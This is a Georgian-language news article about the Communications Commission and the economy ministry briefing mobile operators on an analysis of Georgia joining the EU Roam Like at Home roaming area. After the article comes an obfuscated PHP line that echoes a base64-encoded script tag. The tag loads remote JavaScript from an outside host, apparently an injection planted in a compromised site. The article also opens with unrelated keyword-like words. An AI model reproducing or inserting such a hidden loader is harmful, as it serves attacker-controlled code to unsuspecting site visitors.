celsiusi
ავერსი შნაიდერი

 კომუნიკაციების კომისიამ, საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროსთან ერთად, ევროკავშირის როუმინგის ერთიან სივრცესთან საქართველოს მიერთების მიზნით ჩატარებული ეკონომიკური გავლენის ანალიზის შედეგები მობილურ ოპერატორებს გააცნო.

კომუნიკაციების კომისიის ცნობით, პროექტი შესაბამისი სამართლებრივი თუ ეკონომიკური საფუძვლების მომზადებას, როუმინგული ტარიფების შემცირებას და საქართველოსა და ევროკავშირს შორის განხორციელებულ საერთაშორისო ზარებზე როგორც საბითუმო, ისე საცალო ტარიფების შემცირებას ემსახურება. შეხვედრის ფარგლებში, ევროპელმა ექსპერტებმა იმ დადებით გავლენებზე გაამახვილეს ყურადღება, რომელსაც როუმინგის სივრცესთან მიერთება გამოიწვევს.

როგორც კომუნიკაციების კომისიაში აღნიშნავენ, ანალიზის შედეგად დადგინდა, რომ როუმინგის ერთიან სივრცესთან მიერთებით, ქართველი აბონენტების მიერ მობილური მომსახურებების მისაღებად გაწეული დანახარჯები მნიშვნელოვნად შემცირდება.

„ამასთან ერთად, როგორც დიდ, ისე მცირე და საშუალო ბიზნესებს მიეცემათ შესაძლებლობა, ისარგებლონ ინოვაციური საკომუნიკაციო პროდუქტებით და ამასთან, გააფართოონ მათი შექმნილი ციფრული პროდუქტების მოხმარების არეალი. მიერთება ასევე ხელს შეუწყობს საქართველოს ციფრული ბაზრის განვითარებას, ევროკავშირის ერთიან ციფრულ ბაზართან ჰარმონიზაციასა და ევროკავშირში ინტეგრირების პროცესს. გაუმჯობესდება მდგომარეობა ტურიზმის თვალსაზრისითაც და ტურისტებისა თუ უცხოელი ინვესტორებისთვის, საქართველო მეტად მიმზიდველი გახდება.

ევროკავშირის როუმინგულ სივრცეში გასაწევრიანებლად, როუმინგთან დაკავშირებული საქართველოს სამართლებრივი ბაზა და მარეგულირებელი ნორმები, სრულად უნდა შეესაბამებოდეს ევროკავშირისა და ევროპის ქვეყნების მარეგულირებელი ორგანოების გაერთიანების (BEREC) კანონმდებლობას და რეგულაციებს. სწორედ ამიტომ, პროექტის ფარგლებში, შესწავლილი იქნება ევროკავშირისა და საქართველოს სამართლებრივი გარემოს დაახლოების საჭიროებები, რის შემდეგაც, კვლევაში მონაწილე კვალიფიციური ექსპერტები, შემდგომი ნაბიჯების რეკომენდაციებს წარმოადგენენ. ასევე, ComCom-ის და საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს სპეციალისტების ჩართულობით, მომზადდება პირველადი და მეორადი კანონპროექტები, რომლებიც საქართველოს კანონმდებლობის ევროპულ კანონმდებლობასთან ჰარმონიზაციას უზრუნველყოფენ.

შეგახსენებთ, რომ როუმინგის ერთიანი ევროპული სივრცის მომსახურებები მოიხსენიება Roam Like at Home (RLAH) სახელით, რაც ევროკავშირის ქვეყნების აბონენტებს აძლევს შესაძლებლობას, ამ ქვეყნებში გამოიყენონ თავიანთი მობილური მომსახურებები როუმინგის დამატებითი საფასურის გადახდის გარეშე, ან ისარგებლონ მნიშვნელოვნად შემცირებული ტარიფებით“, – აღნიშნულია კომუნიკაციების კომისიის ინფორმაციაში.

354
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");